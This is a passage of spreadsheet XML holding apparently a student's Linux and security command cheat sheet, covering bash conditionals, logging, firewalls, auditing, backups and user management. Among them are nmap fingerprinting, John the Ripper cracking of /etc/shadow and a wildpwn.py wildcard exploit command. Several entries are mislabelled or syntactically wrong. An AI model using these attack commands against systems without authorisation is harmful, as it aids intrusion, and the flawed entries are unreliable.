  </si>
  <si>
    <t>IF Else Statement:</t>
  </si>
  <si>
    <t>if [&lt;test&gt;]
then
&lt;command&gt;
else
&lt;command&gt;
fi</t>
  </si>
  <si>
    <t>if [5 -gt 8]
then
echo "No Sense"
else
echo "Makes Sense"
fi</t>
  </si>
  <si>
    <t>IF Syntax</t>
  </si>
  <si>
    <t>if [&lt;test&gt;]
then
&lt;command&gt;
fi</t>
  </si>
  <si>
    <t>if [5 -gt 8]
then
&lt;echo "No Sense"&gt;
fi</t>
  </si>
  <si>
    <t>-gt = greater than
fi = ends statement</t>
  </si>
  <si>
    <t>Greater than (-gt)</t>
  </si>
  <si>
    <t>if [$x -gt $y]
then
echo "SAMPLE"
fi</t>
  </si>
  <si>
    <t>if [$UID -gt 1000]
then
echo "Is User"
fi</t>
  </si>
  <si>
    <t>lesser than (-lt)</t>
  </si>
  <si>
    <t>if [$x -lt $y]
then
echo ""SAMPLE""
fi"</t>
  </si>
  <si>
    <t>if [$UID -lt 1000]
then
echo "Not User"
fi</t>
  </si>
  <si>
    <t>Two strings are not equal (!=)</t>
  </si>
  <si>
    <t>if [$x != $y]
then
echo "SAMPLE"
fi</t>
  </si>
  <si>
    <t>if [1002 != 1004]
then
echo "Not Equal"
fi</t>
  </si>
  <si>
    <t>String is equal to another (==)</t>
  </si>
  <si>
    <t>if [$x == $y]
then
echo "SAMPLE"
fi</t>
  </si>
  <si>
    <t>if [$UID == 1004]
then
echo "No Sense"
fi</t>
  </si>
  <si>
    <t>IF &amp;&amp; Syntax</t>
  </si>
  <si>
    <t>if [condition1] &amp;&amp; [condition2]
then 
&lt;command&gt;
else
&lt;command&gt;
fi</t>
  </si>
  <si>
    <t>if [5 -gt 8] &amp;&amp; [4 -gt 3]
then
echo "No Sense"
else
echo "Makes Sense"
fi</t>
  </si>
  <si>
    <t>&amp;&amp; = AND (Runs conditions if more than one condition is met)</t>
  </si>
  <si>
    <t>IF || Syntax</t>
  </si>
  <si>
    <t>if [condition1] || [condition2]
then 
&lt;command&gt;
else
&lt;command&gt;
fi</t>
  </si>
  <si>
    <t>if [5 -gt 8] || [4 -gt 3]
then
echo "No Sense"
else
echo "Makes Sense"
fi</t>
  </si>
  <si>
    <t>|| = OR Command for IF (Runs only if one of the conditions are met)</t>
  </si>
  <si>
    <t>SQL Table Syntax to insert values into specified columns</t>
  </si>
  <si>
    <t>INSERT INTO TABLENAME (COLUMNNAME1, COLUMNNAME2, COLUMNNAME3, COLUMNNAME4)  
VALUES ('VALUE1', 'VALUE2', 'VALUE3', 'VALUE4');</t>
  </si>
  <si>
    <t>INSERT INTO employees (firstname, lastname, email, department)  
VALUES ('Luke', 'Latte', 'llatte@goodcorp.net', 'Logistics');</t>
  </si>
  <si>
    <t>Look at log files related to user based on UID</t>
  </si>
  <si>
    <t>journalctl _UID=[n]</t>
  </si>
  <si>
    <t xml:space="preserve">n = UID number
UID is held in /etc/passwd </t>
  </si>
  <si>
    <t>Lists log results for system boot sequences</t>
  </si>
  <si>
    <t>journalctl --listed-boots</t>
  </si>
  <si>
    <t>Display end of journal entries updating in realtime</t>
  </si>
  <si>
    <t>journalctl -ef</t>
  </si>
  <si>
    <t>-e = displays end of journal
-f = enables follow mode realtime ocuurence.</t>
  </si>
  <si>
    <t>journalctl Syntax</t>
  </si>
  <si>
    <t>journalctl OPTIONS FILTERINFO</t>
  </si>
  <si>
    <t>List all items in the  selected directory.</t>
  </si>
  <si>
    <t>ls</t>
  </si>
  <si>
    <t>Show permission info</t>
  </si>
  <si>
    <t>ls -l</t>
  </si>
  <si>
    <t>List  all files and folders in directory</t>
  </si>
  <si>
    <t>ls -R DIR</t>
  </si>
  <si>
    <t>Prints the file sizes near the file names</t>
  </si>
  <si>
    <t>ls -s</t>
  </si>
  <si>
    <t>List files by size</t>
  </si>
  <si>
    <t>ls -S</t>
  </si>
  <si>
    <t>List and search in files for correct word</t>
  </si>
  <si>
    <t>ls | grep -w "example"</t>
  </si>
  <si>
    <t>ls | grep -w "cat"</t>
  </si>
  <si>
    <t>See Daily cron jobs</t>
  </si>
  <si>
    <t>ls cron.daily</t>
  </si>
  <si>
    <t>located in the /etc directory</t>
  </si>
  <si>
    <t>See Monthly cron jobs</t>
  </si>
  <si>
    <t>ls cron.monthly</t>
  </si>
  <si>
    <t>See Weekly cron jobs</t>
  </si>
  <si>
    <t>ls cron.weekly</t>
  </si>
  <si>
    <t>command manual (help)</t>
  </si>
  <si>
    <t>man</t>
  </si>
  <si>
    <t xml:space="preserve">man ls </t>
  </si>
  <si>
    <t xml:space="preserve">Checks if MD5 hash  matches </t>
  </si>
  <si>
    <t>md5sum -c HASHEDFILENAME.txt &gt; CHECKFILENAME.txt</t>
  </si>
  <si>
    <t>md5sum -c hashes.txt &gt; md5check.txt</t>
  </si>
  <si>
    <t>-c = check</t>
  </si>
  <si>
    <t>Hashing filename and redirecting it to an output file</t>
  </si>
  <si>
    <t>md5sum FILENAME.txt &gt; HASHEDFILENAME.txt</t>
  </si>
  <si>
    <t>md5sum secretmessage.txt &gt; hashes.txt</t>
  </si>
  <si>
    <t>make a directory (Folder)</t>
  </si>
  <si>
    <t>mkdir example</t>
  </si>
  <si>
    <t>mkdir Test</t>
  </si>
  <si>
    <t>Showing the  output page by page</t>
  </si>
  <si>
    <t>more</t>
  </si>
  <si>
    <t>Moves  a file or directory to another directory</t>
  </si>
  <si>
    <t>mv FILENAME.txt /DIR</t>
  </si>
  <si>
    <t>mv example.txt /home/usr/test/example.txt</t>
  </si>
  <si>
    <t>Renaming using mv</t>
  </si>
  <si>
    <t>mv FILENAME.txt FILENAME</t>
  </si>
  <si>
    <t>mv example.txt test.txt</t>
  </si>
  <si>
    <t>Text Reader and Modification</t>
  </si>
  <si>
    <t>nano FILENAME</t>
  </si>
  <si>
    <t>nano example.txt</t>
  </si>
  <si>
    <t>Can edit and save over files</t>
  </si>
  <si>
    <t>Text Editor</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">nano </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">nano </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>example.sh</t>
    </r>
  </si>
  <si>
    <t>NMAP Syntax to perform OS fingerprinting using fast execution</t>
  </si>
  <si>
    <t>nmap -A -T4 IPADDRESS</t>
  </si>
  <si>
    <t>NMAP Syntax to enumerate the type of firewall in use</t>
  </si>
  <si>
    <t>nmap -sA IPADDRESS</t>
  </si>
  <si>
    <t>NMAP Syntax to perform an IP protocol scan</t>
  </si>
  <si>
    <t>nmap -sO IPADDRESS</t>
  </si>
  <si>
    <t>NMAP Syntax to perform a UDP fast scan</t>
  </si>
  <si>
    <t>nmap -sU -F IPADDRESS</t>
  </si>
  <si>
    <t>NMAP Syntax to enumerate a service type</t>
  </si>
  <si>
    <t>nmap -sV IPADDRESS</t>
  </si>
  <si>
    <t>execute network scanner that helps us discover running machines information</t>
  </si>
  <si>
    <t>nmap IPADDRESS</t>
  </si>
  <si>
    <t>nmap 192.168.2.10</t>
  </si>
  <si>
    <t>Searches for MX record for DomainName</t>
  </si>
  <si>
    <t>nslookup -type=MX DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">nslookup -type=MX </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF000000"/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t>Searches  for Name Servers for DomainName</t>
  </si>
  <si>
    <t>nslookup -type=NS DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">nslookup -type=MX </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF000000"/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t>NsLookup Tool</t>
  </si>
  <si>
    <t>nslookup IPADDRESS or DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">nslookup </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t>Assigning AES encryption key to file</t>
  </si>
  <si>
    <t>openssl enc -pbkdf2 -nosalt -aes-256-cbc -in FILENAME.txt -out FILENAME.txt.enc -base64 -K PRIVATEKEY -iv IVENCODING</t>
  </si>
  <si>
    <t>openssl enc -pbkdf2 -nosalt -aes-256-cbc -in plainmessage.txt -out plainmessage.txt.enc -base64 -K CB5862B51D7F3EFB1735FBC835B6AE8A15918F8573768CEBC7A17F00B62AC8ED -iv 77370664DBE2F1B45CDE6219D99B7EFD</t>
  </si>
  <si>
    <t>openssl initializes the OpenSSL program.
enc stands for encryption.
-pbkdf2 specifies the encryption key type.
-nosalt specifies that salting will not be applied.
-aes-256-cbc the type of cipher used.
-in plainmessage.txt is the input file that we will be encrypting.
-out plainmessage.txt.enc is the output file that is encrypted.
-base64 specifies completing the encryption in a text format.
-K 89E01536AC207279409D4DE1E5253E01F4A1769E696DB0D6062CA9B8F56767C8 specifies the key and the key value.
-iv EE99333010B23C01E6364E035E97275C specifies the IV and the IV value.</t>
  </si>
  <si>
    <t>Decrypts the contents of a file  using provided private key and IV</t>
  </si>
  <si>
    <t xml:space="preserve">openssl enc -pbkdf2 -nosalt -aes-256-cbc -in plainmessage.txt.enc -d -base64 -K KEYCONTENTS -iv IVCONTENTS
</t>
  </si>
  <si>
    <t xml:space="preserve">openssl enc -pbkdf2 -nosalt -aes-256-cbc -in plainmessage.txt.enc -d -base64 -K CB5862B51D7F3EFB1735FBC835B6AE8A15918F8573768CEBC7A17F00B62AC8ED -iv 77370664DBE2F1B45CDE6219D99B7EFD
</t>
  </si>
  <si>
    <t xml:space="preserve">Creating a AES encryption key </t>
  </si>
  <si>
    <t>openssl enc -pbkdf2 -nosalt -aes-256-cbc -k PRIVATEKEY -P &gt; AESENCFILENAME</t>
  </si>
  <si>
    <t>openssl initializes the OpenSSL program.
enc stands for encryption.
-pbkdf2 specifies the encryption key type.
-nosalt specifies that salting will not be applied.
(Salting, which will be covered in more depth later, adds a random value.)
-aes-256-cbc is the name of the cipher used.
-k PASSWORD creates a key, with the password mypassword.
-P &gt; key_and_IV prints out the key and IV to a file called key_and_IV.</t>
  </si>
  <si>
    <t>Command to reset a users password</t>
  </si>
  <si>
    <t>passwd USERNAME</t>
  </si>
  <si>
    <t>passwd john</t>
  </si>
  <si>
    <t xml:space="preserve">Overwrites  Path file and adds script  directory to $PATH </t>
  </si>
  <si>
    <t>PATH=$PATH: usr/bin:/home/USER/SCRIPTDIR</t>
  </si>
  <si>
    <t>PATH=$PATH: usr/bin:/home/sysadmin/my_scripts</t>
  </si>
  <si>
    <t>stored in bin or usr/bin</t>
  </si>
  <si>
    <t>Read the metadata of a pdf file</t>
  </si>
  <si>
    <t>pdfinfo FILENAME</t>
  </si>
  <si>
    <t>pdfinfo example.pdf</t>
  </si>
  <si>
    <t>ping -c 4 DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">ping -c 4 </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t>sends only 4 ICMP echo requests</t>
  </si>
  <si>
    <t>Detemine communication and speed between device and network</t>
  </si>
  <si>
    <t>ping IPADDRESS or DOMAINNAME</t>
  </si>
  <si>
    <t>ping 192.168.2.10</t>
  </si>
  <si>
    <t>Snapshots running processes (pts)</t>
  </si>
  <si>
    <t>ps</t>
  </si>
  <si>
    <t>Snapshots all running processes (pts)</t>
  </si>
  <si>
    <t>ps -a</t>
  </si>
  <si>
    <t xml:space="preserve">Admin priviledge search of process  for all users. </t>
  </si>
  <si>
    <t>ps aux</t>
  </si>
  <si>
    <t>ps aux | less = for less lines</t>
  </si>
  <si>
    <t>Prints current working directory</t>
  </si>
  <si>
    <t>pwd</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <color rgb="FFFEF8E3"/>
      </rPr>
      <t xml:space="preserve">Exploit command to run </t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>wildpwn.py</t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FFFEF8E3"/>
      </rPr>
      <t xml:space="preserve">  vulnerability.</t>
    </r>
  </si>
  <si>
    <t>python wildpwn.py -h</t>
  </si>
  <si>
    <t>Python selects payload as tar file for Tar:python exploit</t>
  </si>
  <si>
    <t>python wildpwn.py tar .</t>
  </si>
  <si>
    <t>Remove a file</t>
  </si>
  <si>
    <t>rm</t>
  </si>
  <si>
    <t>Remove a directory</t>
  </si>
  <si>
    <t>rmdir example</t>
  </si>
  <si>
    <t>rmdir Test</t>
  </si>
  <si>
    <t>Reads and edits text line-by-line from an input stream</t>
  </si>
  <si>
    <t>sed s/example/'newexample'/</t>
  </si>
  <si>
    <t>sed s/dog/'cat'/</t>
  </si>
  <si>
    <t>edits line in dog.txt  using sed</t>
  </si>
  <si>
    <t>sed s/example/'newexample'/ FILENAME &gt; example.txt</t>
  </si>
  <si>
    <t>sed s/dog/'cat'/ dog.txt</t>
  </si>
  <si>
    <t>edits line in dog.txt  using sed, then redirects to cat.txt file</t>
  </si>
  <si>
    <t>sed s/cat/'dog'/ dog.txt &gt; cat.txt</t>
  </si>
  <si>
    <t>SQL Table Syntax to   show all results within table with specific value</t>
  </si>
  <si>
    <t>SELECT * FROM TABLENAME WHERE COLUMNNAME='SPECIFICVALUENAME';</t>
  </si>
  <si>
    <t>SELECT * FROM employees WHERE department='Operations';</t>
  </si>
  <si>
    <t>SQL Table Syntax to   show all results within table</t>
  </si>
  <si>
    <t>SELECT * FROM TABLENAME;</t>
  </si>
  <si>
    <t>SELECT * FROM employees;</t>
  </si>
  <si>
    <t>Shell script indicator</t>
  </si>
  <si>
    <t>sh</t>
  </si>
  <si>
    <t>Run SHell Script</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">sh </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve"> FILENAME.txt</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">sh </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve"> FILENAME.txt</t>
    </r>
  </si>
  <si>
    <t>hashes file</t>
  </si>
  <si>
    <t>sha256sum $file</t>
  </si>
  <si>
    <t>Hashing filename via SHA256</t>
  </si>
  <si>
    <t>sha256sum FILENAME.txt &gt; HASHEDFILENAME.txt</t>
  </si>
  <si>
    <t>sha256 secretmessage.txt &gt; hashes.txt</t>
  </si>
  <si>
    <t xml:space="preserve">reloads bash service </t>
  </si>
  <si>
    <t>source .bashrc</t>
  </si>
  <si>
    <t xml:space="preserve">Accessing Remote User Over Network </t>
  </si>
  <si>
    <t>ssh USERNAME@NODEIP</t>
  </si>
  <si>
    <t>ssh jamesp@192.168.2.10</t>
  </si>
  <si>
    <t>Embedding Txt File into Image using steghide</t>
  </si>
  <si>
    <t>steghide embed -cf IMAGENAME -ef TXTFILENAME</t>
  </si>
  <si>
    <t>steghide embed -cf family.jpg -ef hidden_message.txt</t>
  </si>
  <si>
    <t>Extracting Txt File from Image using steghide</t>
  </si>
  <si>
    <t>steghide extract -sf IMAGENAME</t>
  </si>
  <si>
    <t>steghide extract -sf family.jpg</t>
  </si>
  <si>
    <t>Sign into differnt local user</t>
  </si>
  <si>
    <t>su - USERNAME</t>
  </si>
  <si>
    <t>su - jamesp</t>
  </si>
  <si>
    <t>Super Admin Privilege</t>
  </si>
  <si>
    <t>sudo</t>
  </si>
  <si>
    <t>Lists the sudo priviledges for a user</t>
  </si>
  <si>
    <t>sudo -l</t>
  </si>
  <si>
    <t>shows you sudo access of user</t>
  </si>
  <si>
    <t>sudo -l -U USERNAME</t>
  </si>
  <si>
    <t>sudo -l -U john</t>
  </si>
  <si>
    <t>Assesses if User has access to run sudo commands</t>
  </si>
  <si>
    <t>sudo -lU USERNAME</t>
  </si>
  <si>
    <t>Switch to root user</t>
  </si>
  <si>
    <t>sudo -s</t>
  </si>
  <si>
    <t>Start Firewalld service syntax</t>
  </si>
  <si>
    <t>sudo /etc/init.d/firewalld start</t>
  </si>
  <si>
    <t>Creating a group</t>
  </si>
  <si>
    <t>sudo addgroup GROUPNAME</t>
  </si>
  <si>
    <t>sudo addgroup General</t>
  </si>
  <si>
    <t>Adds a local user to machine without creating a home directory</t>
  </si>
  <si>
    <t>sudo adduser --system --no-create-home splunk --group</t>
  </si>
  <si>
    <t>Creates user</t>
  </si>
  <si>
    <t>sudo adduser USERNAME</t>
  </si>
  <si>
    <t>sudo adduser Mike</t>
  </si>
  <si>
    <t>Install  package and bypasses all Y/N  Prompts</t>
  </si>
  <si>
    <t>sudo apt -y install example</t>
  </si>
  <si>
    <t>sudo apt -y install lynis</t>
  </si>
  <si>
    <t>-y = Yes to all (disregards Y/N prompts)</t>
  </si>
  <si>
    <t>Install audit d d</t>
  </si>
  <si>
    <t>sudo apt install auditd -y</t>
  </si>
  <si>
    <t>Install Docker Syntax</t>
  </si>
  <si>
    <t>sudo apt install docker.io</t>
  </si>
  <si>
    <t>Install eog command</t>
  </si>
  <si>
    <t>sudo apt install eog</t>
  </si>
  <si>
    <t>Install lynis package</t>
  </si>
  <si>
    <t>sudo apt install EXAMPLEPACKAGE</t>
  </si>
  <si>
    <t>sudo apt install lynis</t>
  </si>
  <si>
    <t>Install EXIFTOOL</t>
  </si>
  <si>
    <t>sudo apt install libimage-exiftool-perl</t>
  </si>
  <si>
    <t>Install Logrotate package as sudo</t>
  </si>
  <si>
    <t>sudo apt install logrotate</t>
  </si>
  <si>
    <t>Uninstalling package via sudo</t>
  </si>
  <si>
    <t>sudo apt remove PACKAGE</t>
  </si>
  <si>
    <t>lists rules for auditting</t>
  </si>
  <si>
    <t>sudo auditctl -l</t>
  </si>
  <si>
    <t>Any modifications to shadow will be auditted</t>
  </si>
  <si>
    <t xml:space="preserve">sudo auditctl -w /etc/shadow </t>
  </si>
  <si>
    <t>Any modifications to usr will be auditted</t>
  </si>
  <si>
    <t>sudo auditctl -w /usr</t>
  </si>
  <si>
    <t>Authentication report</t>
  </si>
  <si>
    <t>sudo aureport -au</t>
  </si>
  <si>
    <t>Report about account modifications</t>
  </si>
  <si>
    <t>sudo aureport -m</t>
  </si>
  <si>
    <t xml:space="preserve">Apply permissions based on Owner, </t>
  </si>
  <si>
    <t>sudo chmod (600&gt;746) /FILEDIR/FILENAME</t>
  </si>
  <si>
    <t>sudo chmod 600 /etc/shadow</t>
  </si>
  <si>
    <t>Make File Executable</t>
  </si>
  <si>
    <t>sudo chmod +x FILENAME</t>
  </si>
  <si>
    <t>Change owner, group, other Permissions to read and write</t>
  </si>
  <si>
    <t>sudo chmod u=rw (OWNER), g=rw (group), o=rw (other) FILENAME</t>
  </si>
  <si>
    <t xml:space="preserve">Change owner for </t>
  </si>
  <si>
    <t>sudo chown USERNAME:USERNAME GROUPNAME</t>
  </si>
  <si>
    <t>sudo chown root:engineers /home/engineers/SharedFolder/</t>
  </si>
  <si>
    <t>listing contents of crontab as sudo to see system crontabs</t>
  </si>
  <si>
    <t>sudo crontab -l</t>
  </si>
  <si>
    <t>Delete Group</t>
  </si>
  <si>
    <t>sudo delgroup GROUPNAME</t>
  </si>
  <si>
    <t>sudo delgroup General</t>
  </si>
  <si>
    <t>Deletes all user data  for user over FTP</t>
  </si>
  <si>
    <t>sudo deluser --remove-all-files USERNAME</t>
  </si>
  <si>
    <t>sudo deluser james  --remove-all-files ftp</t>
  </si>
  <si>
    <t>Deleting the User  and their home</t>
  </si>
  <si>
    <t xml:space="preserve">sudo deluser --remove-home USERNAME </t>
  </si>
  <si>
    <t>sudo deluser Mike --remove-home</t>
  </si>
  <si>
    <t>Download  ansible container via docker.</t>
  </si>
  <si>
    <t>sudo docker pull cyberxsecurity/ansible</t>
  </si>
  <si>
    <t>Ran ansible container via docker.</t>
  </si>
  <si>
    <t>sudo docker run -ti cyberxsecurity/ansible bash</t>
  </si>
  <si>
    <t>Help command for lynis</t>
  </si>
  <si>
    <t>sudo EXAMPLEPACKAGE --help</t>
  </si>
  <si>
    <t>sudo lynis --help</t>
  </si>
  <si>
    <t>Searches for files in Home Directory  with 777 (any ex) permissions</t>
  </si>
  <si>
    <t xml:space="preserve">sudo find /home -type f -perm 777 </t>
  </si>
  <si>
    <t xml:space="preserve"> Firewalld syntax to list currently configured services
</t>
  </si>
  <si>
    <t>sudo firewall-cmd --get-services</t>
  </si>
  <si>
    <t>Firewalld syntax to list all current zones.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --list-all-zones</t>
  </si>
  <si>
    <t>Creates Firewalld Zone</t>
  </si>
  <si>
    <t>Sudo firewall-cmd --permanent --new-zone=ZONENAME</t>
  </si>
  <si>
    <t>Sudo firewall-cmd --permanent --new-zone=mail</t>
  </si>
  <si>
    <t xml:space="preserve"> Firewalld syntax to block pings for specific zones.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --add-icmp-block=echo-reply --add-icmp-block=echo-request</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=work --add-icmp-block=echo-reply --add-icmp-block=echo-request</t>
  </si>
  <si>
    <t xml:space="preserve"> Firewalld syntax to add specific rules to specific zones.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --add-rich-rule='RULE family="FAMILYNAME" source address="IPADDRESS" reject'</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=work --add-rich-rule='rule family="ipv4" source address="10.10.0.10" reject'</t>
  </si>
  <si>
    <t xml:space="preserve"> Firewalld syntax to add a service for specific zones.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --add-service=SERVICENAME</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=home --add-service=telnet</t>
  </si>
  <si>
    <t xml:space="preserve"> Firewalld syntax to bind together interfaces.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --change-interface=INTERFACENAME</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=work --change-interface=eth1</t>
  </si>
  <si>
    <t>Firewalld syntax to list all currently configured services for a specific zone.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --list-all</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=work --list-all</t>
  </si>
  <si>
    <t>Firewalld syntax to list all services for specific zone.</t>
  </si>
  <si>
    <t>sudo firewall-cmd --zone=ZONENAME --list-services</t>
  </si>
  <si>
    <t>Elevate John the Ripper: shows password in shadow file preview</t>
  </si>
  <si>
    <t>sudo john --show FILENAME</t>
  </si>
  <si>
    <t>sudo john --show shadow</t>
  </si>
  <si>
    <t xml:space="preserve">Elevated John the Ripper on a specific file  </t>
  </si>
  <si>
    <t>sudo john FILENAME</t>
  </si>
  <si>
    <t>sudo john shadow</t>
  </si>
  <si>
    <t>shadow is store for passwords</t>
  </si>
  <si>
    <t>Kills all  processes  for a specific user</t>
  </si>
  <si>
    <t>sudo killall -u USERNAME</t>
  </si>
  <si>
    <t>sudo killall -u jack</t>
  </si>
  <si>
    <t>forcing and showing results of a manual logrotate</t>
  </si>
  <si>
    <t>sudo logrotate -vf /etc/logrotate.conf</t>
  </si>
  <si>
    <t>-v = verbose
-f = force</t>
  </si>
  <si>
    <t>Audit command for group</t>
  </si>
  <si>
    <t>sudo lynis audit --test-from-group "GROUPNAME"</t>
  </si>
  <si>
    <t>sudo lynis audit --test-from-group "firewalls"</t>
  </si>
  <si>
    <t>Editor for audit rules file</t>
  </si>
  <si>
    <t>sudo nano /etc/audit/rules.d/audit.rules</t>
  </si>
  <si>
    <t>Script edit of journald</t>
  </si>
  <si>
    <t>sudo nano /etc/systemd/journald.conf</t>
  </si>
  <si>
    <t>NMAP Syntax to scan and guess OS version and ports on machine</t>
  </si>
  <si>
    <t>sudo nmap -O -p 1-500 --osscan-guess IPADDRESS</t>
  </si>
  <si>
    <t>sudo nmap -O -p 1-500 --osscan-guess 172.17.18.7</t>
  </si>
  <si>
    <t>-O = operating system</t>
  </si>
  <si>
    <t>Stop firewalld service</t>
  </si>
  <si>
    <t>sudo service firewalld stop</t>
  </si>
  <si>
    <t>Replays all pcap files in Security Onion</t>
  </si>
  <si>
    <t>sudo so-replay</t>
  </si>
  <si>
    <t>Restarts SecOnion Service</t>
  </si>
  <si>
    <t>sudo so-restart</t>
  </si>
  <si>
    <t>Check SecOnion Status</t>
  </si>
  <si>
    <t>sudo so-status</t>
  </si>
  <si>
    <t>Disabling a service via sudo</t>
  </si>
  <si>
    <t>sudo systemctl disable SERVICENAME</t>
  </si>
  <si>
    <t>sudo systemctl disable smbd.service</t>
  </si>
  <si>
    <t>Restart system log file daemon</t>
  </si>
  <si>
    <t>sudo systemctl restart systemd-journald</t>
  </si>
  <si>
    <t>Start a service via sudo</t>
  </si>
  <si>
    <t>sudo systemctl start SERVICENAME</t>
  </si>
  <si>
    <t>Check System Statuse of Docker Service</t>
  </si>
  <si>
    <t>sudo systemctl status docker</t>
  </si>
  <si>
    <t>Checking status of a service via sudo</t>
  </si>
  <si>
    <t>sudo systemctl status SERVICENAME</t>
  </si>
  <si>
    <t>systemctl status smbd.service</t>
  </si>
  <si>
    <t>Stopping a service via sudo</t>
  </si>
  <si>
    <t>sudo systemctl stop SERVICENAME</t>
  </si>
  <si>
    <t>sudo systemctl stop smbd.service</t>
  </si>
  <si>
    <t>Samba Service</t>
  </si>
  <si>
    <t>Creating an Archive using tar in current directory</t>
  </si>
  <si>
    <t>sudo tar cvf ARCHIVENAME ARCHIVEDIR</t>
  </si>
  <si>
    <t>sudo tar cvf 2018-1-15.tar /var/log</t>
  </si>
  <si>
    <t>c = create, v= verbose, f= titles</t>
  </si>
  <si>
    <t>Setup incrimental backup</t>
  </si>
  <si>
    <t>sudo tar cvvWf FILENAME.tar --listed-incremental=FILENAME.snar --level=0 DIR</t>
  </si>
  <si>
    <t>sudo tar cvvWf 20190505epscript.tar --listed-incremental=emerg_epscript.snar --level=0 escriptemergency</t>
  </si>
  <si>
    <t>level 0= First backup in series (Full Backup)</t>
  </si>
  <si>
    <t>lists everything in incremental backup</t>
  </si>
  <si>
    <t>sudo tar tvvf FILENAME.tar --incremental</t>
  </si>
  <si>
    <t>sudo tar tvvf 20190505epscript.tar --incremental</t>
  </si>
  <si>
    <t>Allowing port number  on UFW</t>
  </si>
  <si>
    <t>sudo ufw allow PORTNUMBER</t>
  </si>
  <si>
    <t>sudo ufw allow 80</t>
  </si>
  <si>
    <t>Allow connection from IP via port number</t>
  </si>
  <si>
    <t>sudo ufw allowORdeny from SERVERIP to any port #</t>
  </si>
  <si>
    <t>sudo ufw allow from 172.16.18.70 to any port 22</t>
  </si>
  <si>
    <t>UFW command to deny all incoming packets</t>
  </si>
  <si>
    <t>sudo ufw default deny incoming</t>
  </si>
  <si>
    <t>UFW command to allow outgoing packets</t>
  </si>
  <si>
    <t>sudo ufw default deny outgoing</t>
  </si>
  <si>
    <t>Syntax to delete UFW rule</t>
  </si>
  <si>
    <t>sudo ufw delete deny PORTNUMBER</t>
  </si>
  <si>
    <t>sudo ufw delete deny 110</t>
  </si>
  <si>
    <t>Denying port number on UFW</t>
  </si>
  <si>
    <t>sudo ufw deny PORTNUMBER</t>
  </si>
  <si>
    <t>sudo ufw deny 110</t>
  </si>
  <si>
    <t>Disable UFW command</t>
  </si>
  <si>
    <t>sudo ufw disable</t>
  </si>
  <si>
    <t>Enable UFW command</t>
  </si>
  <si>
    <t>sudo ufw enable</t>
  </si>
  <si>
    <t>Reloads UFW rules without disabling service</t>
  </si>
  <si>
    <t>sudo ufw reload</t>
  </si>
  <si>
    <t>Reset UFW command</t>
  </si>
  <si>
    <t>sudo ufw reset</t>
  </si>
  <si>
    <t>Status Check UFW command</t>
  </si>
  <si>
    <t>sudo ufw status</t>
  </si>
  <si>
    <t>UFW status more info</t>
  </si>
  <si>
    <t>sudo ufw status verbose</t>
  </si>
  <si>
    <t>Add user to group</t>
  </si>
  <si>
    <t>sudo usermod -aG GROUPNAME USERNAME</t>
  </si>
  <si>
    <t>sudo usermod -aG General Mike</t>
  </si>
  <si>
    <t>-aG = Add Group</t>
  </si>
  <si>
    <t>Remove User from Group</t>
  </si>
  <si>
    <t>sudo usermod -G GROUPNAME USERNAME</t>
  </si>
  <si>
    <t>sudo usermod -G General Mike</t>
  </si>
  <si>
    <t>-G = Remove</t>
  </si>
  <si>
